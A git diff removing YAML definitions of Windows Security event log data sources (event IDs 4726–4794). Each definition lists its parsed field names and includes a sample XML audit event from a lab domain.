-example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/><EventID>4726</EventID><Version>0</Version><Level>0</Level><Task>13824</Task><Opcode>0</Opcode><Keywords>0x8020000000000000</Keywords><TimeCreated SystemTime='2024-02-21T19:38:47.481373400Z'/><EventRecordID>279283</EventRecordID><Correlation/><Execution ProcessID='612' ThreadID='3184'/><Channel>Security</Channel><Computer>ar-win-dc.attackrange.local</Computer><Security/></System><EventData><Data Name='TargetUserName'>LYNN_WOLF</Data><Data Name='TargetDomainName'>ATTACKRANGE</Data><Data Name='TargetSid'>S-1-5-21-2851375338-1978525053-2422663219-2445</Data><Data Name='SubjectUserSid'>ATTACKRANGE\Administrator</Data><Data Name='SubjectUserName'>Administrator</Data><Data Name='SubjectDomainName'>ATTACKRANGE</Data><Data Name='SubjectLogonId'>0x592d1</Data><Data Name='PrivilegeList'>-</Data></EventData></Event>
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4738.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4738.yml
deleted file mode 100644
index 34da3484ea..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4738.yml
+++ /dev/null
@@ -1,107 +0,0 @@
-event_name: Windows Event Log Security 4738
-fields:
-- _time
-- AccountExpires
-- AllowedToDelegateTo
-- Caller_Domain
-- Caller_User_Name
-- CategoryString
-- Channel
-- Computer
-- DisplayName
-- Dummy
-- Error_Code
-- EventCode
-- EventData_Xml
-- EventID
-- EventRecordID
-- Guid
-- HomeDirectory
-- HomePath
-- Keywords
-- Level
-- LogonHours
-- Logon_ID
-- Name
-- NewUacValue
-- OldUacValue
-- Opcode
-- PasswordLastSet
-- PrimaryGroupId
-- PrivilegeList
-- ProcessID
-- ProfilePath
-- RecordNumber
-- SamAccountName
-- ScriptPath
-- SidHistory
-- SubjectDomainName
-- SubjectLogonId
-- SubjectUserName
-- SubjectUserSid
-- SystemTime
-- System_Props_Xml
-- TargetDomainName
-- TargetSid
-- TargetUserName
-- Target_Domain
-- Target_User_Name
-- Task
-- ThreadID
-- UserAccountControl
-- UserParameters
-- UserPrincipalName
-- UserWorkstations
-- Version
-- action
-- app
-- change_type
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_nt_domain
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- name
-- object
-- object_attrs
-- object_category
-- object_id
-- product
-- punct
-- result
-- session_id
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- src_nt_domain
-- src_user
-- src_user_name
-- status
-- subject
-- ta_windows_action
-- ta_windows_security_CategoryString
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- user_group
-- user_name
-- vendor
-- vendor_product
-example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-A5BA-3E3B0328C30D}'/><EventID>4738</EventID><Version>0</Version><Level>0</Level><Task>13824</Task><Opcode>0</Opcode><Keywords>0x8020000000000000</Keywords><TimeCreated SystemTime='2022-11-17T03:25:57.674067800Z'/><EventRecordID>6389713</EventRecordID><Correlation/><Execution ProcessID='640' ThreadID='1800'/><Channel>Security</Channel><Computer>ar-win-dc.attackrange.local</Computer><Security/></System><EventData><Data Name='Dummy'>-</Data><Data Name='TargetUserName'>unpriv</Data><Data Name='TargetDomainName'>ATTACKRANGE</Data><Data Name='TargetSid'>S-1-5-21-945660386-2529346225-2932127451-1112</Data><Data Name='SubjectUserSid'>S-1-5-21-945660386-2529346225-2932127451-500</Data><Data Name='SubjectUserName'>Administrator</Data><Data Name='SubjectDomainName'>ATTACKRANGE</Data><Data Name='SubjectLogonId'>0x54bb3a</Data><Data Name='PrivilegeList'>-</Data><Data Name='SamAccountName'>-</Data><Data Name='DisplayName'>-</Data><Data Name='UserPrincipalName'>-</Data><Data Name='HomeDirectory'>-</Data><Data Name='HomePath'>-</Data><Data Name='ScriptPath'>-</Data><Data Name='ProfilePath'>-</Data><Data Name='UserWorkstations'>-</Data><Data Name='PasswordLastSet'>-</Data><Data Name='AccountExpires'>-</Data><Data Name='PrimaryGroupId'>-</Data><Data Name='AllowedToDelegateTo'>-</Data><Data Name='OldUacValue'>-</Data><Data Name='NewUacValue'>-</Data><Data Name='UserAccountControl'>-</Data><Data Name='UserParameters'>-</Data><Data Name='SidHistory'>
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4739.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4739.yml
deleted file mode 100644
index 7743880eae..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4739.yml
+++ /dev/null
@@ -1,94 +0,0 @@
-event_name: Windows Event Log Security 4739
-fields:
-- _time
-- Caller_Domain
-- Caller_User_Name
-- CategoryString
-- Channel
-- Computer
-- DomainBehaviorVersion
-- DomainName
-- DomainPolicyChanged
-- DomainSid
-- Error_Code
-- EventCode
-- EventData_Xml
-- EventID
-- EventRecordID
-- ForceLogoff
-- Guid
-- Keywords
-- Level
-- LockoutDuration
-- LockoutObservationWindow
-- LockoutThreshold
-- Logon_ID
-- MachineAccountQuota
-- MaxPasswordAge
-- MinPasswordAge
-- MinPasswordLength
-- MixedDomainMode
-- Name
-- OemInformation
-- Opcode
-- PasswordHistoryLength
-- PasswordProperties
-- PrivilegeList
-- ProcessID
-- RecordNumber
-- SubjectDomainName
-- SubjectLogonId
-- SubjectUserName
-- SubjectUserSid
-- SystemTime
-- System_Props_Xml
-- Task
-- ThreadID
-- Version
-- action
-- app
-- change_type
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- name
-- object_attrs
-- object_category
-- product
-- punct
-- result
-- session_id
-- severity
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- src_nt_domain
-- src_user
-- status
-- subject
-- ta_windows_action
-- ta_windows_security_CategoryString
-- tag
-- tag::action
-- tag::eventtype
-- timeendpos
-- timestartpos
-- vendor
-- vendor_product
-example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-A5BA-3E3B0328C30D}'/><EventID>4739</EventID><Version>0</Version><Level>0</Level><Task>13569</Task><Opcode>0</Opcode><Keywords>0x8020000000000000</Keywords><TimeCreated SystemTime='2024-02-02T00:37:16.161168500Z'/><EventRecordID>394176</EventRecordID><Correlation/><Execution ProcessID='600' ThreadID='3780'/><Channel>Security</Channel><Computer>ar-win-dc.attackrange.local</Computer><Security/></System><EventData><Data Name='DomainPolicyChanged'>Lockout Policy</Data><Data Name='DomainName'>ATTACKRANGE</Data><Data Name='DomainSid'>ATTACKRANGE\</Data><Data Name='SubjectUserSid'>NT AUTHORITY\SYSTEM</Data><Data Name='SubjectUserName'>AR-WIN-DC$</Data><Data Name='SubjectDomainName'>ATTACKRANGE</Data><Data Name='SubjectLogonId'>0x3e7</Data><Data Name='PrivilegeList'>-</Data><Data Name='MinPasswordAge'>-</Data><Data Name='MaxPasswordAge'>-</Data><Data Name='ForceLogoff'>-</Data><Data Name='LockoutThreshold'>1</Data><Data Name='LockoutObservationWindow'>-</Data><Data Name='LockoutDuration'>-</Data><Data Name='PasswordProperties'>-</Data><Data Name='MinPasswordLength'>-</Data><Data Name='PasswordHistoryLength'>-</Data><Data Name='MachineAccountQuota'>-</Data><Data Name='MixedDomainMode'>-</Data><Data Name='DomainBehaviorVersion'>-</Data><Data Name='OemInformation'>-</Data></EventData></Event>
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4741.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4741.yml
deleted file mode 100644
index 125d12d773..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4741.yml
+++ /dev/null
@@ -1,105 +0,0 @@
-event_name: Windows Event Log Security 4741
-fields:
-- _time
-- AccountExpires
-- AllowedToDelegateTo
-- Caller_Domain
-- Caller_User_Name
-- CategoryString
-- Channel
-- Computer
-- DisplayName
-- DnsHostName
-- Error_Code
-- EventCode
-- EventData_Xml
-- EventID
-- EventRecordID
-- Guid
-- HomeDirectory
-- HomePath
-- Keywords
-- Level
-- LogonHours
-- Logon_ID
-- Name
-- NewUacValue
-- OldUacValue
-- Opcode
-- PasswordLastSet
-- PrimaryGroupId
-- PrivilegeList
-- ProcessID
-- ProfilePath
-- RecordNumber
-- SamAccountName
-- ScriptPath
-- ServicePrincipalNames
-- SidHistory
-- SubjectDomainName
-- SubjectLogonId
-- SubjectUserName
-- SubjectUserSid
-- SystemTime
-- System_Props_Xml
-- TargetDomainName
-- TargetSid
-- TargetUserName
-- Target_Domain
-- Target_User_Name
-- Task
-- ThreadID
-- UserAccountControl
-- UserParameters
-- UserPrincipalName
-- UserWorkstations
-- Version
-- action
-- app
-- change_type
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_nt_domain
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- name
-- object_attrs
-- object_category
-- product
-- punct
-- result
-- session_id
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- src_nt_domain
-- src_user
-- status
-- subject
-- ta_windows_action
-- ta_windows_security_CategoryString
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- user_group
-- user_type
-- vendor
-- vendor_product
-example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/><EventID>4741</EventID><Version>0</Version><Level>0</Level><Task>13825</Task><Opcode>0</Opcode><Keywords>0x8020000000000000</Keywords><TimeCreated SystemTime='2024-04-08T18:48:04.618400500Z'/><EventRecordID>143475</EventRecordID><Correlation/><Execution ProcessID='636' ThreadID='1776'/><Channel>Security</Channel><Computer>ar-win-dc.attackrange.local</Computer><Security/></System><EventData><Data Name='TargetUserName'>AR-WIN-2$</Data><Data Name='TargetDomainName'>ATTACKRANGE</Data><Data Name='TargetSid'>ATTACKRANGE\AR-WIN-2$</Data><Data Name='SubjectUserSid'>ATTACKRANGE\Administrator</Data><Data Name='SubjectUserName'>Administrator</Data><Data Name='SubjectDomainName'>ATTACKRANGE</Data><Data Name='SubjectLogonId'>0xd9f04</Data><Data Name='PrivilegeList'>-</Data><Data Name='SamAccountName'>AR-WIN-2$</Data><Data Name='DisplayName'>-</Data><Data Name='UserPrincipalName'>-</Data><Data Name='HomeDirectory'>-</Data><Data Name='HomePath'>-</Data><Data Name='ScriptPath'>-</Data><Data Name='ProfilePath'>-</Data><Data Name='UserWorkstations'>-</Data><Data Name='PasswordLastSet'>4/8/2024 6:48:04 PM</Data><Data Name='AccountExpires'>%%1794</Data><Data Name='PrimaryGroupId'>515</Data><Data Name='AllowedToDelegateTo'>-</Data><Data Name='OldUacValue'>0x0</Data><Data Name='NewUacValue'>0x80</Data><Data Name='UserAccountControl'>
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4742.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4742.yml
deleted file mode 100644
index 6ca72500e1..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4742.yml
+++ /dev/null
@@ -1,106 +0,0 @@
-event_name: Windows Event Log Security 4742
-fields:
-- _time
-- AccountExpires
-- AllowedToDelegateTo
-- Caller_Domain
-- Caller_User_Name
-- CategoryString
-- Channel
-- Computer
-- ComputerAccountChange
-- DisplayName
-- DnsHostName
-- Error_Code
-- EventCode
-- EventData_Xml
-- EventID
-- EventRecordID
-- Guid
-- HomeDirectory
-- HomePath
-- Keywords
-- Level
-- LogonHours
-- Logon_ID
-- Name
-- NewUacValue
-- OldUacValue
-- Opcode
-- PasswordLastSet
-- PrimaryGroupId
-- PrivilegeList
-- ProcessID
-- ProfilePath
-- RecordNumber
-- SamAccountName
-- ScriptPath
-- ServicePrincipalNames
-- SidHistory
-- SubjectDomainName
-- SubjectLogonId
-- SubjectUserName
-- SubjectUserSid
-- SystemTime
-- System_Props_Xml
-- TargetDomainName
-- TargetSid
-- TargetUserName
-- Target_Domain
-- Target_User_Name
-- Task
-- ThreadID
-- UserAccountControl
-- UserParameters
-- UserPrincipalName
-- UserWorkstations
-- Version
-- action
-- app
-- change_type
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_nt_domain
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- name
-- object_attrs
-- object_category
-- product
-- punct
-- result
-- session_id
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- src_nt_domain
-- src_user
-- status
-- subject
-- ta_windows_action
-- ta_windows_security_CategoryString
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- user_group
-- user_type
-- vendor
-- vendor_product
-example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-A5BA-3E3B0328C30D}'/><EventID>4742</EventID><Version>0</Version><Level>0</Level><Task>13825</Task><Opcode>0</Opcode><Keywords>0x8020000000000000</Keywords><TimeCreated SystemTime='2022-08-04T09:26:26.793335600Z'/><EventRecordID>901860</EventRecordID><Correlation/><Execution ProcessID='636' ThreadID='2340'/><Channel>Security</Channel><Computer>win-dc-root-04195-428.attackrange.local</Computer><Security/></System><EventData><Data Name='ComputerAccountChange'>-</Data><Data Name='TargetUserName'>WIN-HOST-ROOT-0$</Data><Data Name='TargetDomainName'>ATTACKRANGE</Data><Data Name='TargetSid'>S-1-5-21-199921393-3534762603-6736986-1111</Data><Data Name='SubjectUserSid'>S-1-5-21-199921393-3534762603-6736986-500</Data><Data Name='SubjectUserName'>Administrator</Data><Data Name='SubjectDomainName'>ATTACKRANGE</Data><Data Name='SubjectLogonId'>0x177304</Data><Data Name='PrivilegeList'>-</Data><Data Name='SamAccountName'>-</Data><Data Name='DisplayName'>-</Data><Data Name='UserPrincipalName'>-</Data><Data Name='HomeDirectory'>-</Data><Data Name='HomePath'>-</Data><Data Name='ScriptPath'>-</Data><Data Name='ProfilePath'>-</Data><Data Name='UserWorkstations'>-</Data><Data Name='PasswordLastSet'>-</Data><Data Name='AccountExpires'>-</Data><Data Name='PrimaryGroupId'>-</Data><Data Name='AllowedToDelegateTo'>-</Data><Data Name='OldUacValue'>-</Data><Data Name='NewUacValue'>-</Data><Data Name='UserAccountControl'>-</Data><Data Name='UserParameters'>-</Data><Data Name='SidHistory'>
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4768.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4768.yml
deleted file mode 100644
index 6cc2b321a0..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4768.yml
+++ /dev/null
@@ -1,86 +0,0 @@
-event_name: Windows Event Log Security 4768
-fields:
-- _time
-- Channel
-- Computer
-- Error_Code
-- EventCode
-- EventData_Xml
-- EventID
-- EventRecordID
-- Guid
-- IpAddress
-- IpPort
-- Keywords
-- Level
-- Name
-- Opcode
-- PreAuthType
-- ProcessID
-- RecordNumber
-- ServiceName
-- ServiceSid
-- Source_Port
-- Source_Workstation
-- Status
-- SystemTime
-- System_Props_Xml
-- TargetDomainName
-- TargetSid
-- TargetUserName
-- Target_Domain
-- Target_User_Name
-- Task
-- ThreadID
-- TicketEncryptionType
-- TicketOptions
-- Version
-- action
-- app
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_nt_domain
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- name
-- product
-- punct
-- service
-- service_id
-- service_name
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- src_nt_host
-- src_port
-- status
-- subject
-- ta_windows_action
-- ta_windows_status
-- tag
-- tag::action
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- user_group
-- vendor
-- vendor_product
-example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-A5BA-3E3B0328C30D}'/><EventID>4768</EventID><Version>0</Version><Level>0</Level><Task>14339</Task><Opcode>0</Opcode><Keywords>0x8010000000000000</Keywords><TimeCreated SystemTime='2022-09-08T18:16:25.601071000Z'/><EventRecordID>391562</EventRecordID><Correlation/><Execution ProcessID='644' ThreadID='3500'/><Channel>Security</Channel><Computer>win-dc-mvelazco-02713-392.attackrange.local</Computer><Security/></System><EventData><Data Name='TargetUserName'>RXETPKZH</Data><Data Name='TargetDomainName'>attackrange.local</Data><Data Name='TargetSid'>NULL SID</Data><Data Name='ServiceName'>krbtgt/attackrange.local</Data><Data Name='ServiceSid'>NULL SID</Data><Data Name='TicketOptions'>0x40810010</Data><Data Name='Status'>0x12</Data><Data Name='TicketEncryptionType'>0xffffffff</Data><Data Name='PreAuthType'>-</Data><Data Name='IpAddress'>::ffff:10.0.1.15</Data><Data Name='IpPort'>64568</Data><Data Name='CertIssuerName'></Data><Data Name='CertSerialNumber'></Data><Data Name='CertThumbprint'></Data></EventData></Event>
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4769.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4769.yml
deleted file mode 100644
index 250fe32850..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4769.yml
+++ /dev/null
@@ -1,86 +0,0 @@
-event_name: Windows Event Log Security 4769
-fields:
-- _time
-- Channel
-- Computer
-- Error_Code
-- EventCode
-- EventData_Xml
-- EventID
-- EventRecordID
-- Guid
-- IpAddress
-- IpPort
-- Keywords
-- Level
-- LogonGuid
-- Name
-- Opcode
-- ProcessID
-- RecordNumber
-- ServiceName
-- ServiceSid
-- Source_Port
-- Source_Workstation
-- Status
-- SystemTime
-- System_Props_Xml
-- TargetDomainName
-- TargetUserName
-- Target_Domain
-- Target_User_Name
-- Task
-- ThreadID
-- TicketEncryptionType
-- TicketOptions
-- TransmittedServices
-- Version
-- action
-- app
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_nt_domain
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- name
-- product
-- punct
-- service
-- service_id
-- service_name
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- src_nt_host
-- src_port
-- status
-- subject
-- ta_windows_action
-- ta_windows_status
-- tag
-- tag::action
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- user_group
-- vendor
-- vendor_product
-example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/><EventID>4769</EventID><Version>0</Version><Level>0</Level><Task>14337</Task><Opcode>0</Opcode><Keywords>0x8020000000000000</Keywords><TimeCreated SystemTime='2024-04-09T01:00:49.143003800Z'/><EventRecordID>148521</EventRecordID><Correlation/><Execution ProcessID='636' ThreadID='1776'/><Channel>Security</Channel><Computer>ar-win-dc.attackrange.local</Computer><Security/></System><EventData><Data Name='TargetUserName'>AR-WIN-2$@ATTACKRANGE.LOCAL</Data><Data Name='TargetDomainName'>ATTACKRANGE.LOCAL</Data><Data Name='ServiceName'>AR-WIN-2$</Data><Data Name='ServiceSid'>ATTACKRANGE\AR-WIN-2$</Data><Data Name='TicketOptions'>0x40810000</Data><Data Name='TicketEncryptionType'>0x17</Data><Data Name='IpAddress'>::ffff:10.0.1.15</Data><Data Name='IpPort'>59191</Data><Data Name='Status'>0x0</Data><Data Name='LogonGuid'>{3b4ad75b-7184-6094-b975-ea3f91932ee0}</Data><Data Name='TransmittedServices'>-</Data></EventData></Event>
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4771.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4771.yml
deleted file mode 100644
index a64772d5a6..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4771.yml
+++ /dev/null
@@ -1,80 +0,0 @@
-event_name: Windows Event Log Security 4771
-fields:
-- _time
-- Channel
-- Computer
-- Error_Code
-- EventCode
-- EventData_Xml
-- EventID
-- EventRecordID
-- Guid
-- IpAddress
-- IpPort
-- Keywords
-- Level
-- Name
-- Opcode
-- PreAuthType
-- ProcessID
-- RecordNumber
-- ServiceName
-- Source_Port
-- Source_Workstation
-- Status
-- SystemTime
-- System_Props_Xml
-- TargetSid
-- TargetUserName
-- Target_User_Name
-- Task
-- ThreadID
-- TicketOptions
-- Version
-- action
-- app
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- name
-- product
-- punct
-- service
-- service_name
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- src_nt_host
-- src_port
-- status
-- subject
-- ta_windows_action
-- ta_windows_status
-- tag
-- tag::action
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- user_group
-- vendor
-- vendor_product
-example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-A5BA-3E3B0328C30D}'/><EventID>4771</EventID><Version>0</Version><Level>0</Level><Task>14339</Task><Opcode>0</Opcode><Keywords>0x8010000000000000</Keywords><TimeCreated SystemTime='2022-09-08T17:44:20.554179400Z'/><EventRecordID>391511</EventRecordID><Correlation/><Execution ProcessID='644' ThreadID='3500'/><Channel>Security</Channel><Computer>win-dc-mvelazco-02713-392.attackrange.local</Computer><Security/></System><EventData><Data Name='TargetUserName'>ALLISON_WATERS</Data><Data Name='TargetSid'>ATTACKRANGE\ALLISON_WATERS</Data><Data Name='ServiceName'>krbtgt/attackrange.local</Data><Data Name='TicketOptions'>0x40810010</Data><Data Name='Status'>0x18</Data><Data Name='PreAuthType'>2</Data><Data Name='IpAddress'>::ffff:10.0.1.15</Data><Data Name='IpPort'>64134</Data><Data Name='CertIssuerName'></Data><Data Name='CertSerialNumber'></Data><Data Name='CertThumbprint'></Data></EventData></Event>
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4776.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4776.yml
deleted file mode 100644
index fc5142b47c..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4776.yml
+++ /dev/null
@@ -1,71 +0,0 @@
-event_name: Windows Event Log Security 4776
-fields:
-- _time
-- Channel
-- Computer
-- Error_Code
-- EventCode
-- EventData_Xml
-- EventID
-- EventRecordID
-- Guid
-- Keywords
-- Level
-- Name
-- Opcode
-- PackageName
-- ProcessID
-- RecordNumber
-- Source_Workstation
-- Status
-- SystemTime
-- System_Props_Xml
-- TargetUserName
-- Target_User_Name
-- Task
-- ThreadID
-- Version
-- Workstation
-- action
-- app
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- name
-- product
-- punct
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- src
-- src_nt_host
-- status
-- subject
-- ta_windows_action
-- ta_windows_status
-- tag
-- tag::action
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- user_group
-- vendor
-- vendor_product
-example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-A5BA-3E3B0328C30D}'/><EventID>4776</EventID><Version>0</Version><Level>0</Level><Task>14336</Task><Opcode>0</Opcode><Keywords>0x8010000000000000</Keywords><TimeCreated SystemTime='2022-09-08T19:03:50.057600300Z'/><EventRecordID>391615</EventRecordID><Correlation/><Execution ProcessID='644' ThreadID='6100'/><Channel>Security</Channel><Computer>win-dc-mvelazco-02713-392.attackrange.local</Computer><Security/></System><EventData><Data Name='PackageName'>MICROSOFT_AUTHENTICATION_PACKAGE_V1_0</Data><Data Name='TargetUserName'>KSYLEFUA</Data><Data Name='Workstation'>WIN-HOST-MVELAZ</Data><Data Name='Status'>0xc0000064</Data></EventData></Event>
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4781.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4781.yml
deleted file mode 100644
index 26de808b1b..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4781.yml
+++ /dev/null
@@ -1,88 +0,0 @@
-event_name: Windows Event Log Security 4781
-fields:
-- _time
-- ActivityID
-- Caller_Domain
-- Caller_User_Name
-- CategoryString
-- Channel
-- Computer
-- Error_Code
-- EventCode
-- EventData_Xml
-- EventID
-- EventRecordID
-- Guid
-- Keywords
-- Level
-- Logon_ID
-- Name
-- NewTargetUserName
-- OldTargetUserName
-- Opcode
-- PrivilegeList
-- ProcessID
-- RecordNumber
-- SubjectDomainName
-- SubjectLogonId
-- SubjectUserName
-- SubjectUserSid
-- SystemTime
-- System_Props_Xml
-- TargetDomainName
-- TargetSid
-- Target_Domain
-- Task
-- ThreadID
-- Version
-- action
-- app
-- change_type
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_nt_domain
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- name
-- object
-- object_attrs
-- object_category
-- object_id
-- product
-- punct
-- result
-- session_id
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- src_nt_domain
-- src_user
-- src_user_name
-- status
-- subject
-- ta_windows_action
-- ta_windows_security_CategoryString
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- user_name
-- vendor
-- vendor_product
-example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/><EventID>4781</EventID><Version>0</Version><Level>0</Level><Task>13824</Task><Opcode>0</Opcode><Keywords>0x8020000000000000</Keywords><TimeCreated SystemTime='2024-04-09T22:22:45.521723900Z'/><EventRecordID>148763</EventRecordID><Correlation ActivityID='{b05ffbda-8ac8-0003-e6fb-5fb0c88ada01}'/><Execution ProcessID='620' ThreadID='3936'/><Channel>Security</Channel><Computer>ar-win-dc.attackrange.local</Computer><Security/></System><EventData><Data Name='OldTargetUserName'>AR-WIN-2$</Data><Data Name='NewTargetUserName'>Administrator</Data><Data Name='TargetDomainName'>ATTACKRANGE</Data><Data Name='TargetSid'>ATTACKRANGE\AR-WIN-2$</Data><Data Name='SubjectUserSid'>ATTACKRANGE\Administrator</Data><Data Name='SubjectUserName'>Administrator</Data><Data Name='SubjectDomainName'>ATTACKRANGE</Data><Data Name='SubjectLogonId'>0x141a04</Data><Data Name='PrivilegeList'>-</Data></EventData></Event>
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4794.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4794.yml
deleted file mode 100644
index 512d37cfef..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4794.yml
+++ /dev/null
@@ -1,79 +0,0 @@
-event_name: Windows Event Log Security 4794
-fields:
-- _time
-- ActivityID
-- Caller_Domain
-- Caller_User_Name
-- CategoryString
-- Channel
-- Computer
-- Error_Code
-- EventCode
-- EventData_Xml
-- EventID
-- EventRecordID
-- Guid
-- Keywords
-- Level
-- Logon_ID
-- Name
-- Opcode
-- ProcessID
-- RecordNumber
-- Source_Workstation
-- Status
-- SubjectDomainName
-- SubjectLogonId
-- SubjectUserName
-- SubjectUserSid
-- SystemTime
-- System_Props_Xml
-- Task
-- ThreadID
-- Version
-- Workstation
-- action
-- app
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- name
-- product
-- punct
-- session_id
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- src
-- src_nt_domain
-- src_nt_host
-- src_user
-- status
-- subject
-- ta_windows_action
-- ta_windows_security_CategoryString
-- ta_windows_status
-- tag
-- tag::action
-- tag::eventtype
-- timeendpos
-- timestartpos
-- vendor
-- vendor_product
